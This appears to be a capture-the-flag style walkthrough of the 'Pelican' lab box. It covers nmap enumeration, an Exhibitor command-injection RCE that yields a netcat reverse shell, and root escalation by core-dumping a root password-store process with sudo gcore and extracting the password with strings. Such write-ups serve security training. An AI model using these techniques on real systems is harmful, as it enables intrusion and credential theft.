Cheat Sheets

Pelican

Intro

This box provided many services for enumeration. While we attempted to use the autorecon to perform this enumeration, most of the results produced by this tool are not covered within this walkthrough. Ultimately, identifying an RCE vulnerability within the Exhibitor application allowed us to gain initial access. Privilege escalation was achieved by leveraging our limited sudo privileges to create a core dump of a sensitive process which contained password secrets for the root user.

Initial Foothold

We began by running an NMAP scan to identify exposed services and their versions. 

# Nmap 7.94SVN scan initiated Fri Oct 25 09:19:14 2024 as: nmap -p- -sV -sC -vv -oA nmap/fulltcp pelican.pg
Nmap scan report for pelican.pg (192.168.167.98)
Host is up, received echo-reply ttl 61 (0.053s latency).
Scanned at 2024-10-25 09:19:14 CDT for 63s
Not shown: 65526 closed tcp ports (reset)
PORT      STATE SERVICE     REASON         VERSION
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
631/tcp   open  ipp         syn-ack ttl 61 CUPS 2.2
|_http-server-header: CUPS/2.2 IPP/2.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Bad Request - CUPS v2.2.10
2181/tcp  open  zookeeper   syn-ack ttl 61 Zookeeper 3.4.6-1569965 (Built on 02/20/2014)
2222/tcp  open  ssh         syn-ack ttl 61 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 a8:e1:60:68:be:f5:8e:70:70:54:b4:27:ee:9a:7e:7f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDssyyACw3AHaTatHhBU1VyBRbKOirrDG8M9IjpJPTf/v8mdIqiXk1HsBdoFZcsmWJVV4OXC7GMcHa+s0tZceTmgGf5TpiCB2yXUYPZre183LjJWM6KQMZVI0LHz9Yd3ji2bdD5jjtVxwnjrdx8GlU1THMGbzZivfSsPF18arMIq3ukYBS09Ov1SIKR4DJ7pjtBRutRBZKI/8/H+uB2u47AQRwbWuVaOmtZyDrfvgL/IqAFRQrbeP1VNQAErzHl8wNuk1vR+yROv0j7smTqoqqc8aB751O63gtBdCvKzpigwFDLyxYuzu8dW1Hh6ZQzaQZgWkw6SZeExAijK7yXSU61
|   256 bb:99:9a:45:3f:35:0b:b3:49:e6:cf:11:49:87:8d:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNUPmkVV/Q+iD07j1sFmdFWp7yppofTTgfzAhvMkyGPulIdMDbzFgW/pRAq3R3zZV7aEcWAMfFHgdXfj3W4FUuc=
|   256 f2:eb:fc:45:d7:e9:80:77:66:a3:93:53:de:00:57:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIPO1eLYoJ0AhVJ5NIDfaSrfUis34Bw5bKMMdFWzHPx0
8080/tcp  open  http        syn-ack ttl 61 Jetty 1.0
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(1.0)
8081/tcp  open  http        syn-ack ttl 61 nginx 1.14.2
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2
|_http-title: Did not follow redirect to http://pelican.pg:8080/exhibitor/v1/ui/index.html
44267/tcp open  java-rmi    syn-ack ttl 61 Java RMI
Service Info: Host: PELICAN; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m34s, median: 0s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2024-10-25T14:20:12
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 61403/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 55032/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 35856/udp): CLEAN (Timeout)
|   Check 4 (port 39528/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: pelican
|   NetBIOS computer name: PELICAN\x00
|   Domain name: \x00
|   FQDN: pelican
|_  System time: 2024-10-25T10:20:14-04:00

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 25 09:20:17 2024 -- 1 IP address (1 host up) scanned in 63.56 seconds

Reviewing running services for known vulnerabilities, we identified a remote command execution vulnerability in the Exhibitor for ZooKeeper web application. 

┌──(joe㉿kali)-[~]
└─$ searchsploit Exhibitor
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Exhibitor Web UI 1.7.1 - Remote Code Execution         | java/webapps/48654.txt
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

The Exhibitor application was found to execute commands included in the 'java.env script' field, when fomatted with backticks or the $() notation. By supplying the desired command and committing changes, we were able to catch a reverse shell as the user charles. 

┌──(joe㉿kali)-[~/hax/pg/pelican]
└─$ nc -lvnp 8080     
listening on [any] 8080 ...
connect to [192.168.45.183] from (UNKNOWN) [192.168.167.98] 49776
whoami
charles

Privilege Escalation

We were able to list our sudo privileges without supplying charles' password, and identified that we had privileges to run the /usr/bin/gcore command. 

charles@pelican:/opt/zookeeper$ sudo -l
sudo -l
Matching Defaults entries for charles on pelican:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on pelican:
    (ALL) NOPASSWD: /usr/bin/gcore

The gcore command allows for the creation of core dumps of processes. Running this command as root allows us to generate core dumps of sensitive processes. Reviewing the process list, we can see that the root user is running the password-store process. 

charles@pelican:/opt/zookeeper$ ps -aux | grep root | grep pass
ps -aux | grep root | grep pass
root       486  0.0  0.0   2276   140 ?        Ss   10:13   0:00 /usr/bin/password-store

We then produced a core dump of the password-store process with the gcore utility. 

charles@pelican:/opt/zookeeper$ sudo /usr/bin/gcore 486
sudo /usr/bin/gcore 486
0x00007fddd67856f4 in __GI___nanosleep (requested_time=requested_time@entry=0x7ffcf6253d00, remaining=remaining@entry=0x7ffcf6253d00) at ../sysdeps/unix/sysv/linux/nanosleep.c:28
28	../sysdeps/unix/sysv/linux/nanosleep.c: No such file or directory.
Saved corefile core.486
[Inferior 1 (process 486) detached]

Running strings on the core dump identified a potential password for the root user. 

charles@pelican:/opt/zookeeper$ strings core.486 | grep -C 1 -i password
strings core.486 | grep -C 1 -i password
CORE
password-store
/usr/bin/password-store 
CORE
--
ELIFCORE
/usr/bin/password-store
/usr/bin/password-store
/usr/lib/x86_64-linux-gnu/libc-2.28.so
--
////////////////
001 Password: root:
ClogKingpinInning731
>A-x86_64
/usr/bin/password-store
HOME=/root
--
PWD=/root
/usr/bin/password-store
bemX

Using this password, we were able to su to the root user. 

charles@pelican:/opt/zookeeper$ su root
su root
Password: ClogKingpinInning731

root@pelican:/opt/zookeeper#

PreviousQuackerjackNextOchima

Last updated